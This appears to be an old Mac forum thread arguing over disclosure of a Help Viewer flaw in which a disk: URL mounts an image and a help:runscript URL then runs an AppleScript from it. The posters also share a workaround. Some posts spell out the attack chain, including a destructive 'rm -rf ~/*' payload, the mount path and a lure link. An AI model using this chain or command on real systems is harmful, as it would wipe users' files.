[lixlpixel]

you posted this several hours ago and it already didn't work then - want to know why ?

because i disabled the help application 3 months ago .

and yes - i CAN read...

[JLL]

Originally posted by lixlpixel:
do you really believe i would make that public without telling Apple ?

I LOVE APPLE

i can't sleep since i did it - i only did it because of so many "new" (more or less serious) exploits for the Mac surfaced.

(and because Apple didn't respond on my bug report for over two months)

Excuse me, but you sent a BUG REPORT??? That bug report is probably buried deep in some developer's to do list and haven't been read by the right people yet.

Contact Apple directly at [email protected]

NOW!!!!

Next time someone feels they have to make a security hole public because Apple didn't respond to your e-mail, bug report or something like that, please read this page first:

http://www.info.apple.com/usen/security/index.html

[lixlpixel]

wrong - i'm a webmaster - and webmasters just love to keep logs you must know...

and someone@apple was exactly 5 hours after the bug report on the site.

and again the day after - and so on ...

[JLL]

Originally posted by lixlpixel:
wrong - i'm a webmaster - and webmasters just love to keep logs you must know...

and someone@apple was exactly 5 hours after the bug report on the site.

and again the day after - and so on ...

So you're leaning back saying "Someone at Apple has seen this - I'm certainly not going to mail Apple at at [email protected]. The Apple guy can do that" ??

Just contact the right people!

[Groovy]

Originally posted by lixlpixel:
you posted this several hours ago and it already didn't work then - want to know why ?

because i disabled the help application 3 months ago .

and yes - i CAN read...

but it is just the help app? Maybe other apps can be used as well.

[lixlpixel]

well - if the category security under http://developer.apple.com/bugreporter/index.html is NOT the right place to tell this to Apple , then you might be right.

[mcalmus]

This vulnerability is obviously an operating system level bug since it seems to affect most (all?) web browsers. I was able to execute the test cases within Mozilla and have filed a security report with them in case Apple is slow at fixing it.

[Groovy]

Originally posted by mcalmus:
This vulnerability is obviously an operating system level bug since it seems to affect most (all?) web browsers. I was able to execute the test cases within Mozilla and have filed a security report with them in case Apple is slow at fixing it.

interesting.


I wonder if there are any other protocols that could be used.

We know "help:" works


but what about all the others?

[JLL]

Originally posted by lixlpixel:
well - if the category security under http://developer.apple.com/bugreporter/index.html is NOT the right place to tell this to Apple , then you might be right.

You're a stubborn little guy aren't you? Just send the mail.

[lixlpixel]

i have - this morning . (sent an email)

and yesterday i wrote already
and last tuesday another ...



look - i gain nothing but bad karma from this anyway, so i didn't do this for fun, but because i have a lot of friends who don't mind if things get downloaded and mounted and aktivated around them - because they trust ( like me) in apple - and then they wonder why some files are missing.

and i simlpy didn't want to wait until someone makes a bad surprise out of that.

[theolein]

Originally posted by JLL:
Excuse me, but you sent a BUG REPORT??? That bug report is probably buried deep in some developer's to do list and haven't been read by the right people yet.

Contact Apple directly at [email protected]

NOW!!!!

Next time someone feels they have to make a security hole public because Apple didn't respond to your e-mail, bug report or something like that, please read this page first:

http://www.info.apple.com/usen/security/index.html

HEY, WHO the fu�k asked you to be Apple's Nazi? Get off his case already, don't kill the messanger.

For the protection of our customers, Apple does not disclose, discuss or confirm security issues until a full investigation has occurred and any necessary patches or releases are available. Apple usually distributes information about security issues in its products through this site and the mailing list below.

For the protection of their customers, my arse. Bloody chickens can't even be honest here, of all places.

In any case, we'll see how long it takes Apple to move their fat arses after Slashdot gets on their case.

[Person Man]

Originally posted by theolein:
For the protection of their customers, my arse. Bloody chickens can't even be honest here, of all places.

This is standard operating procedure for most companies whenever a security bug is found. Let them do their job, properly.

[theolein]

Originally posted by Person Man:
This is standard operating procedure for most companies whenever a security bug is found. Let them do their job, properly.

Bullsh�t, if they would do their job properly we wouldn't be discussing this right now.

[Person Man]

Originally posted by theolein:
Bullsh�t, if they would do their job properly we wouldn't be discussing this right now.

Would you rather have a *proper* fix done right and released in a week's (or longer) time, or a half-assed job done quickly right now that isn't properly tested that may have the potential to break huge parts of the operating system (or worse, introduce an even BIGGER security hole)?

[theolein]

Originally posted by Person Man:
Would you rather have a *proper* fix done right and released in a week's time, or a half-assed job done quickly right now that isn't properly tested that may have the potential to break huge parts of the operating system (or worse, introduce an even BIGGER security hole)?

Believe me, and I'm not alone here, I have a difficult time imagining a larger or more dangerous hole than this one. Running rm -rf / as root comes to mind, though

[Person Man]

Originally posted by theolein:
Believe me, and I'm not alone here, I have a difficult time imagining a larger or more dangerous hole than this one. Running rm -rf / as root comes to mind, though

I know. I'm not trying to minimize the danger. If you look, though, Apple is usually (key word) pretty quick about quickly fixing legitimate security holes (and this one is pretty darn legitimate, if you ask me).

The trojans that Intego has gone apesh*t over aren't legitimate security "holes" and as such there is not much one can do to prevent that sort of thing (without making increasingly elaborate hoops for the user to jump through as the trojan writers find a way to socially engineer their way around them).

But, Apple should also be able to fix this hole properly without breaking the useful functionality of being able to automate things from the help system (via AppleScript) for inexperienced users and without breaking other applications' ability to launch the help viewer using the "help://" URL system. (Like say, control-clicking on a button in a program could open the help page explaining what that control does, for example... easy to program in this way).

Again, Apple has traditionally been fairly responsive in fixing legitimate security holes in the past and I have no reason to believe that they will not act in a timely fashion in this case either. (EDIT: Well, if it was reported to them in February, then they do need to do something now).

In any case, jumping up and down and using little copyright symbols to get around the profanity filters in these forums is going to do absolutely NOTHING to fix the problem. Which should have been fixed *yesterday*.

[Tijer]

Originally posted by theolein:
Believe me, and I'm not alone here, I have a difficult time imagining a larger or more dangerous hole than this one. Running rm -rf / as root comes to mind, though

Yeah, this is crazy. I never thought Apple would be so stupid. This is extremely sad and ruins a perfect argument for choosing OS X over Windows.

But what's up with the disk:// thing? I don't see it being run automatically when I press the link? Wasn't it supposed to do that if it's an exploit?

Greets,
Tijer

[Person Man]

Originally posted by Tijer:
Yeah, this is crazy. I never thought Apple would be so stupid. This is extremely sad and ruins a perfect argument for choosing OS X over Windows.

Nobody said the OS was perfect. EVERY operating system has security holes. Apple is no more immune than the rest of them. That doesn't mean they are stupid.

This is nothing more than a design oversight that became a huge security hole. When they designed the help system (read my post above to see why it's designed the way it is), and the ability to automatically mount a disk image from the browser, they probably never even thought about the fact that someone might combine those two things with a browser refresh command to do bad things. Each piece of the exploit was probably developed separately, too.

Before 9/11, *most people* (key words) probably *never* thought that terrorists would hijack planes and crash them into the World Trade Center, Pentagon (and potentially even the White House or Capitol Building).

Same thing here. People make mistakes, and even when you're being more security-conscious from the beginning (like Apple generally does), you are *never* going to eliminate the possibility that any new feature that you introduce, no matter how benign it may be by itself, could be combined with another, equally benign feature by itself, to produce a serious security threat.

To suggest that Apple is immune from these things (as your statement "perfect argument" suggests) is ludicrous.

[Person Man]

Originally posted by Tijer:
But what's up with the disk:// thing? I don't see it being run automatically when I press the link? Wasn't it supposed to do that if it's an exploit?

The disk:// thing by itself won't cause the problem. You have to combine three separate things to have the full hole.

One: a disk image with the malicious code on it. (get the user to download it)
Two: issue a meta-refresh of the page after the image is downloaded (should be able to be accomplished with the right URL)
Three: as part of the refresh of the page, the <help:// ... run script (known path to malicious code on image)> command executes the malicious code on the image).

Three pieces of functionality that, by themselves, don't present anyhwere near as much of a threat as the three of them combined together.

[theolein]

Originally posted by Tijer:
Yeah, this is crazy. I never thought Apple would be so stupid. This is extremely sad and ruins a perfect argument for choosing OS X over Windows.

But what's up with the disk:// thing? I don't see it being run automatically when I press the link? Wasn't it supposed to do that if it's an exploit?

Greets,
Tijer

That's becasue my server is slashdotted or something, if you mean the link I posted.

[Tijer]

Originally posted by theolein:
That's becasue my server is slashdotted or something, if you mean the link I posted.

No no, it's working fine and mounting and everything. But nothing happens until I press the Applescript. Now that isn't really an exploit is it?

[theolein]

Originally posted by Person Man:
I know. I'm not trying to minimize the danger. If you look, though, Apple is usually (key word) pretty quick about quickly fixing legitimate security holes (and this one is pretty darn legitimate, if you ask me).

The trojans that Intego has gone apesh*t over aren't legitimate security "holes" and as such there is not much one can do to prevent that sort of thing (without making increasingly elaborate hoops for the user to jump through as the trojan writers find a way to socially engineer their way around them).

But, Apple should be also be able to fix this hole properly without breaking the useful functionality of being able to automate things from the help system (via AppleScript) for inexperienced users and without breaking other applications' ability to launch the help viewer using the "help://" URL system. (Like say, control-clicking on a button in a program could open the help page explaining what that control does, for example... easy to program in this way).

Again, Apple has traditionally been fairly responsive in fixing legitimate security holes in the past and I have no reason to believe that they will not act in a timely fashion in this case either.

In any case, jumping up and down and using little copyright symbols to get around the profanity filters in these forums is going to do absolutely NOTHING to fix the problem. Which should have been fixed *yesterday*.

Fu�k that. If you think that being PC is going to resolve this any quicker, then you're welcome. A story on slashdot, on the other hand, is sure to put a little fire under Apple's overweight arse.

I don't care if Apple has traditionally been better. I pay Apple for their hardware and software, not the other way around. When they pay me to be polite and shut up, then I will, not before.

I will never understand the zealotry that goes on on this platform.

[Developer]

Originally posted by Tijer:
No no, it's working fine and mounting and everything. But nothing happens until I press the Applescript. Now that isn't really an exploit is it?

Imagine an image gallery with "Next" image links. Silently mount the disk image in the background. The 3rd or so "Next" link is to the Help Viewer URL. How many people would notice before clicking the link? Could be a lot of deleted home folders.

Originally posted by theolein:
A story on slashdot, on the other hand, is sure to put a little fire under Apple's overweight arse.

The heise article should take care of that already.

[theolein]

Originally posted by Tijer:
No no, it's working fine and mounting and everything. But nothing happens until I press the Applescript. Now that isn't really an exploit is it?

It is. Think for a second: A malicious scriptkiddy posts a page on a site that has a Meta refresh tag with a disk;// url in it that automatically mounts a disk image in the background. That disk image always mounts under /Volumes, i.e. the path is known. On that disk image is an Applescript with a simple command in it: do shellscript="rm -rf ~/*". Now on the same webpage that automounted the diskimage in the background, there is a link that says, say, "Click here for naked Asian chicks" or something. The link however, is a url of the type help:runscript=/Volumes/TheDiskImage/TheAppleScript.scpt and once you click it, all your user data is gone, for good.

It is a vulnerability, and a serious one too.

[Tijer]

Originally posted by theolein:
It is. Think for a second: A malicious scriptkiddy posts a page on a site that has a Meta refresh tag with a disk;// url in it that automatically mounts a disk image in the background. That disk image always mounts under /Volumes, i.e. the path is known. On that disk image is an Applescript with a simple command in it: do shellscript="rm -rf ~/*". Now on the same webpage that automounted the diskimage in the background, there is a link that says, say, "Click here for naked Asian chicks" or something. The link however, is a url of the type help:runscript=/Volumes/TheDiskImage/TheAppleScript.scpt and once you click it, all your user data is gone, for good.

It is a vulnerability, and a serious one too.

I see your point. I thought we were talking about two different types of vuln. so solving the help:runscript thing would solve the other.

For now I will go with altering the help: url to Chess, but I will be sad if apple does not have a fix within 2-3 days. This _is_ serious. I agree on that (as mentioned in my previous post).

[Person Man]

Originally posted by theolein:

I will never understand the zealotry that goes on on this platform.

I'm not trying to be a zealot. I, like you, think that the problem needs to be fixed, and it needs to be fixed very quickly. But jumping up and down isn't going to solve anything in the end (and you'll just be out of energy in the end).

The only thing that the media exposure *may* do, is increase the possiblility of a half-assed attempt at a fix. Or, Apple could just address the hype by saying they're aware of the problem and are working on a fix and be patient, because it's coming.

Now, please explain to me how that makes me a "zealot."

[CharlesS]

Originally posted by Developer:
CharlesS, this has nothing to do with the OpnApp.scpt

Deleting the OpnApp.scpt does NOT protect you from this vulnerability!

Neither does it help to modify the OpnApp.scpt or to delete the MacHelp.help as lixlpixel suggests.
HelpViewer will execute any script that it is told to execute in the URL. If the URL is known and fixed this can be exploited. And the URL of a script on a mounted volume is known.

The following link will open the "Current Date & Time.scpt" for example without the use of the OpenApp.scpt

help:runscript=../../Scripts/Info Scripts/Current Date & Time.scpt

My God, you're right. It just gets worse and worse. I can't believe this thing is able to execute any script anywhere on the system, without it even being in the /Library/Documentation/Help folder!

You're right, the thing to do is to change the help: protocol to point to Chess using More Internet (by Diggory Laycock, on the boards - his signature has the link). I'm not sure why deleting the protocol didn't work, but changing it certainly has.

[Stradlater]

Originally posted by theolein:
Damn straight there, Spliff. More sh�t like this from Apple and my next machine will be a PC.

[zen jihad]

It's funny being a cross-platform user. You get to see people kick the cr@p out of MS for actually patching a vulnerability before a virus takes hold. Then to see Apple do nothing about theirs, and some people appluading them for being such visionaries.

[Person Man]

Most of my whole argument rendered moot upon a little more checking. Sorry.

[CharlesS]

^ The original poster said he contacted Apple in February about this. Now it is May. 2-3 months should be enough time to properly address the problem, I would think.

[Person Man]

Originally posted by Developer:

http://fundisom.com/owned/warning

http://www.heise.de/newsticker/meldung/47355 (German)

Ok. The first link says that he notified Apple on February 23 of the flaw. I still wonder if he followed the "official" channels, and if he did, the issue should have been addressed by now.

But I bet the majority of us didn't know about this until yesterday, which is when the second article above was written.

Now that we know about it, we're able to imagine and test other possibilities which make the problem more urgent to fix.

[Person Man]

Originally posted by CharlesS:
^ The original poster said he contacted Apple in February about this. Now it is May. 2-3 months should be enough time to properly address the problem, I would think.

True enough.

Now, would a zealot have conceded your point so easily? I don't think so. Everyone makes mistakes. Even me.

[Developer]

Originally posted by CharlesS:
I can't believe this thing is able to execute any script anywhere on the system, without it even being in the /Library/Documentation/Help folder!

It has to. Most help files are not within /Library/Documentation/Help/ but within the application bundle. So they can be anywhere.

[Sheep]

Originally posted by Person Man:
Anyone ever stop to think about why you can execute AppleScripts from a URL in Help Viewer?

There are places in help files where the help files can offer to show users how to do things, or to open things for other users, for example, "To change system volume, you need to open System Preferences, click on..." Usually, you can find a link that says, "Open System Preferences for me." This system can be used to automate many things for the user, from within help. Very nice for people who aren't as experienced as many of us are.

Help Viewer files are simple HTML files. Apple made a few extensions, such as the runscript URL, so that the above functionality could be made possible.

Now consider for a moment how Safari got the ability to execute the runscript URL from Help Browser. In Panther, at least (I don't know about Jaguar), Help Viewer uses WebCore to render its pages just like Safari does... in fact, you can do the runscript command from any browser that uses the system-wide native WebCore. I find it interesting that Help Viewer launches, but I suspect that that has to do with the fact that Apple has specified by default that the prefix help:// means launch Help Viewer.

Now, how to best fix it? I don't know. The best fix would prevent it from being accessed from a web browser, but not destroy the functionality that it brings to Help Viewer.

It's a very big problem, yes, and one that needs to be fixed, but let's try coming up with solutions that allow for functionality to be preserved, but to limit it in some way to the context it was originally designed for (i.e. you shouldn't be able to launch help browser to run a script from within Safari or any other web browser).

That can probably be solved with a simple if test in WebCore

As for this whole security flaw, this is indeed fu�ked up

[CharlesS]

Originally posted by Person Man:
Nobody said the OS was perfect. EVERY operating system has security holes. Apple is no more immune than the rest of them. That doesn't mean they are stupid.

This is nothing more than a design oversight that became a huge security hole. When they designed the help system (read my post above to see why it's designed the way it is), and the ability to automatically mount a disk image from the browser, they probably never even thought about the fact that someone might combine those two things with a browser refresh command to do bad things. Each piece of the exploit was probably developed separately, too.

Before 9/11, *most people* (key words) probably *never* thought that terrorists would hijack planes and crash them into the World Trade Center, Pentagon (and potentially even the White House or Capitol Building).

Same thing here. People make mistakes, and even when you're being more security-conscious from the beginning (like Apple generally does), you are *never* going to eliminate the possibility that any new feature that you introduce, no matter how benign it may be by itself, could be combined with another, equally benign feature by itself, to produce a serious security threat.

To suggest that Apple is immune from these things (as your statement "perfect argument" suggests) is ludicrous.

If it were something like a buffer overflow or whatever, you would have a point. But:

1. Being able to execute AppleScripts in a URL? You mean to tell me no one could think of why that would be dangerous?

2. Microsoft already did this, and there was a huge security hole because of it as well. It was well known, and old news, and this is why your 9/11 argument is invalid. This is more equivalent to having piss-poor airport security AFTER 9/11, with the result being another plane crashing into a building. "Oh, how could they have known?" doesn't work in this case.

[Person Man]

Originally posted by CharlesS:
If it were something like a buffer overflow or whatever, you would have a point. But:

1. Being able to execute AppleScripts in a URL? You mean to tell me no one could think of why that would be dangerous?

2. Microsoft already did this, and there was a huge security hole because of it as well. It was well known, and old news, and this is why your 9/11 argument is invalid. This is more equivalent to having piss-poor airport security AFTER 9/11, with the result being another plane crashing into a building. "Oh, how could they have known?" doesn't work in this case.

Well, maybe, and maybe not.

Regardless, none of us will ever know for sure, but because history has shown us that, as a group, we tend to make the same mistakes over and over again, it's conceivable that a different type of "oh, how could they have known?" argument could apply.

Event A happens in history. Later, a similar set of circumstances suggests Course B as a solution to the new problem... then you get two groups of people... one group (group 1) says, "that will never work. Course B will lead to the same type of thing as event A." Group 2 says, "no. that will never happen, because this is different." Usually, Group 2 is the one that ends up winning the argument and carries out Course B. What generally ends up happening is that Course B leads to a similar event as Event A, and then Group 2 says, "I don't get it. Things were different. It wasn't supposed to turn out that way." Then Group 1 says, "I told you so."

So, maybe the following scenario is more likely.

(Group of Apple engineers talking about Help Viewer)

Person 1: "The help files will be based on HTML, instead of the proprietary scripting language we used in the old Apple Guide system."
Person 2: "How will we automate tasks for inexperienced users from within Help Files?"
Person 1: "Easy. We'll use AppleScript, just like we did with Apple Guide"
Person 2: "Now wait, you're going to let HTML code execute an AppleScript?"
Person 1: "Sure. Why not?"
Person 2: "Well, Microsoft allowed you to execute scripts from webpages and bad people started taking advantage of that"
Person 1: "Well, this is different because Internet Explorer is designed to be a web browser. Help Viewer is not meant to browse the web. Nobody will be able to exploit it."
Person 2: "I don't know about that..."
Person 1: "Sure it is... trust me. Now, let's make it possible to use the 'load URL' feature to give programmers easy access to direct people to the appropriate section of their online help from within their programs."
Person 2: "Um... if you do that, what's going to stop people from coding webpages that use that feature to launch Help Viewer and then use that to launch an AppleScript? How is that different from the Microsoft flaw?"
Person 1: "Uh, didn't you hear what I said earlier? We're not Microsoft. This is still different enough."
Person 2: "No, it's not."
Person 1: "Yes it is..."
<further arguing>
Person 2: (just to get person 1 to shut up) "OK, fine. Have it your way! But don't say I didn't warn you."

Perhaps the real reason that we don't have a fix yet after 2-3 months is because Person 1 and Person 2 are now having this discussion:

Person 2: "I TOLD you so!"
Person 1: "But how could this have happened? It's totally different."
Person 2: "Well, apparently it wasn't."
Person 1: "Yes it was."
Person 2: "No it wasn't"
<endless finger pointing happens before anyone actually fixes it>

When you put it into this type of context, it's easier to see how Apple may have arrived at the same place Microsoft did even AFTER the problem with Microsoft's implementation was well known. In this case you can't really say that Apple is worse than Microsoft. You can't say that Apple was better than Microsoft.

At best, you can say that, in the end, Apple and Microsoft aren't any better or worse than each other. Of course, some people will still probably label me a "zealot" for saying this. But a zealot would still be trying to defend Apple more than I am. Now that I have actually bothered to look at the very first link in the very first post in this thread, I've changed my mind to be more in line with everyone else's. But I'm still trying to be a bit more realistic. (in my not so humble opinion).

[Person Man]

Oh yeah. I just thought of something...

This will provide us with a more compelling argument against those people who insist on enabling the root account and using that as their primary account.

This is not the be-all-end-all super security hole. There are still others that haven't been found. This may be the most dangerous one to date, but even so, if you're a regular user or admin user, the flaw can't erase your whole computer unless logged in as root.

I know, you could have the AppleScript use "sudo," but then it would have to ask you for your password. Yes, you could probably use some creative social engineering to get around that, but it's still a bit harder to do.

[JLL]

Originally posted by theolein:
HEY, WHO the fu�k asked you to be Apple's Nazi? Get off his case already, don't kill the messanger.

STFU!! I just told him to send an email to the right address.

I want this fixed, and I've sent an email too.

[Link]

Apple won't be respected as a computer company until they use the word "solution" too damn much and put buzzwords all over their OS.

[theolein]

Update: Since this is already on Heise, and Heise is one the most respected IT publishers, and most well read in German speaking countries, I decided to submit the story to Slashdot, along with a detailed explanation as well as, and this is the important part, the workaround to change the .help setting to point to Chess (Also asked them to mirror the disoverer's URL so as not to slashdot his server). The reason I did this is because once its on Heise it means that it will be common knowledge very soon (As Spliffdaddy pointed out, if he knows, and he doesn't even own a Mac or speak German, then everyone knows) and that having a workaround known and available is imperative until Apple decides to fix this.

I apologise to those who think one should keep quiet, but I simply don't see the logic behind that in this case where the vulnerability is already public knowledge.

[Spliffdaddy]

Still hasn't appeared on Slashdot.

Although, there's a May 5th article referencing Apple's inherent lack of public acknowledgement when it comes to security issues.

lol.

If this blatant security flaw doesn't get mentioned on Slashdot's site, I'll just piggyback it on my next copper pipe peecee project. Those always seem to get Slashdotted.

[Person Man]

Originally posted by theolein:
I apologise to those who think one should keep quiet, but I simply don't see the logic behind that in this case where the vulnerability is already public knowledge.

Well, it made more sense to keep quiet when I thought it was just discovered two days ago. Since it's been 2 or 3 months since it was reported to Apple, go ahead and do it, but I would also urge everyone in this thread to send notification to Apple about the flaw to that security page that JLL posted.

[utidjian]

Originally posted by Spliffdaddy:
Still hasn't appeared on Slashdot.

Although, there's a May 5th article referencing Apple's inherent lack of public acknowledgement when it comes to security issues.

lol.

If this blatant security flaw doesn't get mentioned on Slashdot's site, I'll just piggyback it on my next copper pipe peecee project. Those always seem to get Slashdotted.

Just post it as a comment to some other article. Pick something popular and post early... eventuially it will be picked up.

[theolein]

Originally posted by Spliffdaddy:
Still hasn't appeared on Slashdot.

Although, there's a May 5th article referencing Apple's inherent lack of public acknowledgement when it comes to security issues.

lol.

If this blatant security flaw doesn't get mentioned on Slashdot's site, I'll just piggyback it on my next copper pipe peecee project. Those always seem to get Slashdotted.

My submitted article is still in pending status.

[zen jihad]

has anyone heard anything from Apple yet?

[lixlpixel]

Originally posted by zen jihad:
has anyone heard anything from Apple yet?

no

[JLL]

Originally posted by zen jihad:
has anyone heard anything from Apple yet?

Nothing but an automated reply.

[Person Man]

Originally posted by JLL:
Nothing but an automated reply.

The earliest we could expect something is Monday. They probably won't say anything on a weekend.

[utidjian]

A totally fabricated scenario deleted.

Originally posted by Person Man:

At best, you can say that, in the end, Apple and Microsoft aren't any better or worse than each other. Of course, some people will still probably label me a "zealot" for saying this. But a zealot would still be trying to defend Apple more than I am. Now that I have actually bothered to look at the very first link in the very first post in this thread, I've changed my mind to be more in line with everyone else's. But I'm still trying to be a bit more realistic. (in my not so humble opinion).

Oh give me a break. You went to some length to fabricate a totally fictitious scenario and then you claim to be "trying to be a bit more realistic." If anything like your scenario actually happened between software engineers and Apple engineers are at least as good as we hope they are... then all "Person 2" would have to do to get "Person 1" to shut up and understand is write a tiny little bit of HTML. As we have seen, it could have been a single short line. That is how the software engineers I work with settle disputes. It's called "show me the code".

Face it, the engineers at Apple AND the people who manage them screwed up somehow. That "somehow" may never be known. What is far more interesting, to me, is how they are going to un-screw it... and when.